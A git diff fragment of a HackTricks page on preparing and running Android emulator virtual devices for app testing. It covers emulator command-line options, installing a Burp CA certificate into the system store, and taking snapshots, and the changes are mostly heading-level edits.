![](<../../.gitbook/assets/image (334).png>)
|
||||
|
||||
## Command Line tool
|
||||
### Command Line tool
|
||||
|
||||
### Prepare Virtual Machine
|
||||
#### Prepare Virtual Machine
|
||||
|
||||
{% hint style="info" %}
|
||||
In **MacOS** systems the executable is located in `/Users/<username>/Library/Android/sdk/tools/bin`
|
||||
|
@ -178,7 +177,7 @@ The following Android Virtual Devices could not be loaded:
|
|||
Error: Google pixel_2 no longer exists as a device
|
||||
```
|
||||
|
||||
### Run Virtual Machine
|
||||
#### Run Virtual Machine
|
||||
|
||||
We have already seen how you can list the created virtual machines, but **you can also list them using**:
|
||||
|
||||
|
@ -201,16 +200,16 @@ Or using more advance options you can run a virtual machine like:
|
|||
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9" -http-proxy 192.168.1.12:8080 -writable-system
|
||||
```
|
||||
|
||||
### Command line options
|
||||
#### Command line options
|
||||
|
||||
However there are **a lot of different command line useful options** that you can use to initiate a virtual machine. Below you can find some interesting options but can [**find a complete list here**](https://developer.android.com/studio/run/emulator-commandline)
|
||||
|
||||
#### Boot
|
||||
**Boot**
|
||||
|
||||
* `-snapshot name` : Start VM snapshot
|
||||
* `-snapshot-list -snapstorage ~/.android/avd/Nexus_5X_API_23.avd/snapshots-test.img` : List all the snapshots recorded
|
||||
|
||||
#### Network
|
||||
**Network**
|
||||
|
||||
* `-dns-server 192.0.2.0, 192.0.2.255` : Allow to indicate comma separated the DNS servers to the VM.
|
||||
* **`-http-proxy 192.168.1.12:8080`** : Allow to indicate an HTTP proxy to use (very useful to capture the traffic using Burp)
|
||||
|
@ -218,18 +217,18 @@ However there are **a lot of different command line useful options** that you ca
|
|||
* `-ports 5556,5559` : Set the TCP ports used for the console and adb.
|
||||
* **`-tcpdump /path/dumpfile.cap`** : Capture all the traffic in a file
|
||||
|
||||
#### System
|
||||
**System**
|
||||
|
||||
* `-selinux {disabled|permissive}` : Set the Security-Enhanced Linux security module to either disabled or permissive mode on a Linux operating system.
|
||||
* `-timezone Europe/Paris` : Set the timezone for the virtual device
|
||||
* `-screen {touch(default)|multi-touch|o-touch}` : Set emulated touch screen mode.
|
||||
* **`-writable-system`** : Use this option to have a writable system image during your emulation session. You will need also to run `adb root; adb remount`. This is very useful to install a new certificate in the system.
|
||||
|
||||
## Install Burp certificate on a Virtual Machine
|
||||
### Install Burp certificate on a Virtual Machine
|
||||
|
||||
First of all you need to download the Der certificate from Burp. You can do this in _**Proxy**_ --> _**Options**_ --> _**Import / Export CA certificate**_
|
||||
|
||||
![](<../../.gitbook/assets/image (367).png>)
|
||||
![](<../../.gitbook/assets/image (367) (1).png>)
|
||||
|
||||
**Export the certificate in Der format** and lets **transform** it to a form that **Android** is going to be able to **understand.** Note that **in order to configure the burp certificate on the Android machine in AVD** you need to **run** this machine **with** the **`-writable-system`** option.\
|
||||
For example you can run it like:
|
||||
|
@ -253,13 +252,12 @@ adb reboot #Now, reboot the machine
|
|||
|
||||
Once the **machine finish rebooting** the burp certificate will be in use by it!
|
||||
|
||||
## Take a Snapshot
|
||||
### Take a Snapshot
|
||||
|
||||
You can **use the GUI** to take a snapshot of the VM at any time:
|
||||
|
||||
![](<../../.gitbook/assets/image (336).png>)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -275,5 +273,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|